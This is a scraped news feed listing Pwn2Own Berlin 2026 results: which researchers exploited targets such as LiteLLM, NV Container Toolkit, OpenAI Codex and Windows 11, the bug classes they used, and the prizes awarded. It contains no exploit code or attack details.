                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/c9ebfc3c-89fd-466d-bc92-48e4713c48ea/Image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b>
/ 
<b data-preserve-html-node="true">COLLISON</b> - Byung Young Yi (@yibarrack) of Out Of Bounds targeted LiteLLM, hitting a one-vulnerability collision with a previous attempt and earning $17,750 and 3.75 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png" data-image-dimensions="5712x3213" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1000w" width="5712" height="3213" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7e7b7887-1dfc-4f68-ac6d-738cd5416924/IMG_3073.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Confirmed! 0xDACA (@0xDACA) &amp; Noam Trobishi (@NTrobishi) used a use-after-free bug to exploit NV Container Toolkit in the second round, earning $25,000 and 5 Master of Pwn points. </p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png" data-image-dimensions="450x800" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1000w" width="450" height="800" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/53940c80-dc63-428a-82c6-b77580f39f1c/HIYD1L1XkAAxk7G.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a2693c42-e36c-47c4-8af8-405b7e346d12/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a360d8a4-3083-41fa-afcc-9e3f151af5f0/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn2Own Berlin 2026 - Day One Results]]></title>
<description><![CDATA[Welcome to Day One of Pwn2Own Berlin 2026! Today, 22 entries took the Pwn2Own stage to target AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products, as the world’s top security researchers push technology to its limits. Exploits, surprises, and breakthrough di...]]></description>
<link>https://tsecurity.de/de/3694566/hacking/pwn2own-berlin-2026-day-one-results/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694566/hacking/pwn2own-berlin-2026-day-one-results/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Welcome to Day One of Pwn2Own Berlin 2026! Today, 22 entries took the Pwn2Own stage to target AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products, as the world’s top security researchers push technology to its limits. Exploits, surprises, and breakthrough discoveries are unfolding.</p><p class="">After Day One, we awarded $523,000 for 24 unique 0-days! DEVCORE is currently in the lead for Master of Pwn, but a pack of teams are right on their heels. Stay tuned tomorrow for more results and surprises.</p><p class="">Follow the action live! We’ll be posting real-time updates and results throughout the competition on our <a href="https://www.zerodayinitiative.com/blog">blog</a> and across social media. Stay up to date by following us on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, and <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a>, and join the conversation using #Pwn2Own Berlin and #P2OBerlin for continuous coverage. </p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg" data-image-dimensions="1920x1080" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w" width="1920" height="1080" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8147d5eb-a38d-45de-8a2c-fdd3625dca92/Day1aP2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Le Duc Anh Vu (@vulda17) of Viettel Cyber Security (@vcslab) could not get their exploit of OpenAI Codex working within the time allotted.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Orange Tsai (@orange_8361) of DEVCORE Research Team (@d3vc0r3) chained 4 logic bugs to achieve a sandbox escape on Microsoft Edge, earning $175,000 and 17.5 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg" data-image-dimensions="2000x1500" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=1000w" width="2000" height="1500" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/020d4df6-54dc-4c2e-a619-bec0f81b495c/shared+image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - chompie of IBM X-Force Offensive Research (XOR) used a single bug to exploit NV Container Toolkit, earning $50,000 and 5 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg" data-image-dimensions="1767x1330" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=1000w" width="1767" height="1330" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/2146a3e8-818a-45a3-847c-e913e1cd9d78/Media.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - k3vg3n chained 3 bugs including SSRF and Code Injection to take down LiteLLM. $40,000 and 4 Master of Pwn points. Full win. </p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg" data-image-dimensions="4032x2268" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=1000w" width="4032" height="2268" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/7c29c804-939f-4208-91ca-ea0f95a6c3a1/IMG_3052.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Satoki Tsuji (@satoki00) of Ikotas Labs, Inc. used an Overly Permissive Allowed List bug to exploit NVIDIA Megatron Bridge, earning $20,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/44078d4c-c344-401c-ae14-e8122dad17f2/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Park Jae Min could not get their exploit of Oracle Autonomous AI Database  working within the time allotted. #Pwn2Own #P2OBerlin</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) used a single CWE-150 bug to exploit OpenAI Codex, earning $40,000 and 4 Master of Pwn points.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Angelboy (@scwuaptx) &amp; TwinkleStar03 (@_twinklestar03) of DEVCORE Research Team used an Improper Access Control bug to escalate privileges on Microsoft Windows 11, earning $30,000 and 3 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png" data-image-dimensions="4215x3161" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=1000w" width="4215" height="3161" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d8680c0c-ff5e-4949-90db-053fb820371b/image.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Ben Koo (@kiddo_pwn) of Team DDOS has withdrawn their entry for Mozilla Firefox – Renderer Only in the Web Browser category</p>
<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Interrupt Labs could not get their exploit of NV Container Toolkit working within the time allotted</p>
<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, the Ikotas Labs, Inc. team targeting LiteLLM in the Local Inference category used bugs that were previously known. They still earn $8,000 and 1.75 Master of Pwn points. </p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Yoseop Kim (@pwning_me) used a CWE-470 bug to exploit NVIDIA Megatron Bridge in the second round, earning $10,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/15db6b29-35d7-42d8-a0ca-56acdae95d96/IMG_4210.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, maitai (@MaitaiThe) of Doyensec (@Doyensec) targeting OpenAI Codex in the Coding Agent category used a bug that was previously known to the vendor. They still earn $10,000 and 2 Master of Pwn points.</p>
<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Yoseop Kim(@pwning_me) has withdrawn their entry for Mozilla Firefox – Renderer Only in the Web Browser category</p>
